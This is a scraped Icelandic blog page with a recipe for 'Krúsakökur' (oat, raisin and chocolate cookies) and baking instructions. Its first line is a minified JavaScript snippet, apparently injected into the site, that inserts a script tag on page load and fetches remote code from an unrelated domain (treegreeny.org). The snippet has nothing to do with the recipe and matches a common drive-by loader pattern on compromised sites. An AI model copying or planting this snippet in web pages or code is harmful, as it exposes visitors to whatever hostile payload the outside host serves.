;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Krúsakökur – Eydís — Ljósmyndun

Krúsakökur

2 1/2 bolli hveiti
2 bollar haframjöl
2 bollar sykur
250 gr smjörlíki/smjör mjúkt
2 egg
2 tsk lyftiduft
1/2 tsk matarsódi
1 bolli saxaðar rúsínur
200 gr súkkulaði saxað

Þurrefnunum blandað saman í skál, eggjum,smjöri er svo blandað við. Mér finnst best að nota fingurna í þessa vinnu.

Kreista og klípa deigið þannig að smjörið og eggið bindi restina vel saman. Hnoðað og svo mótað í nokkrar aflangar jafnar lengjur og sett í kæli.

Ég geri deigið oft að kvöldi og baka svo daginn eftir.

Skera lengjurnar í jafna bita, móta bitana með fingrunum, búa til kúlur og setja á bökunarklædda ofnplötu, nota svo gaffal til að ýta þeim aðeins niður.

Þær stækka töluvert í ofninum svo það borgar sig að hafa nægt rými á milli þeirra.

Best er að baka þær í miðjum ofni við 175 gráður í 10 mínútur.

krúsakökurnar

Leave a Reply

Your email address will not be published. Required fields are marked *